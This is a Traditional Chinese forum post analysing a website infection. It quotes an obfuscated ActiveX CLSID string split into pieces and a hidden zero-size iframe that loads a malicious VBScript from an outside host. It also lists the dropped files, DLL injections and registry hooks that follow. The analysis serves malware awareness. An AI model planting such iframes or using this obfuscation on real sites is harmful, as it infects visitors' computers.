該病毒作者將一句話切成很多段,以混淆視聽。作者:hwwgo
如
等於語法:j1="clsid:" j2="BD96" j3="C556-" j4="65A3-" j5="11D0-" j6="983A-" j7="00C04FC29E36"
等等。語法:j8="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
該病毒作者將一句話切成很多段,以混淆視聽。作者:hwwgo
如
等於語法:j1="clsid:" j2="BD96" j3="C556-" j4="65A3-" j5="11D0-" j6="983A-" j7="00C04FC29E36"
等等。語法:j8="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
到目前為止都還未修復,而且網站無聯絡電話,真奇怪。
分析了一下,結果如下:
1. 首頁有下面的語法:
<iframe src=http://www.myemage.com/V20/Daren/images/img.html width=0 height=0></iframe>
2. 下載img.html,它是一個VBScript,如前面有人說明(2.exe就是寫在這個script裡)。
3. 執行後,系統有下面的行為:
DLL Injection:
C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe 注入某些執行程序(如svchost.exe)。
C:\WINDOWS\system32\gfile.dll注入某些執行程序(如explorer.exe)。
Drop files:
C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe
C:\WINDOWS\system32\gfile.dll
C:\WINDOWS\system32\goodfile.exe
BHO/CLSID:
{71177AD5-E5B5-4451-A4B0-F31C521B6557}--C:\WINDOWS\system32\gfile.dll
Registry:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks||Value={71177AD5-E5B5-4451-A4B0-F31C521B6557}
書籤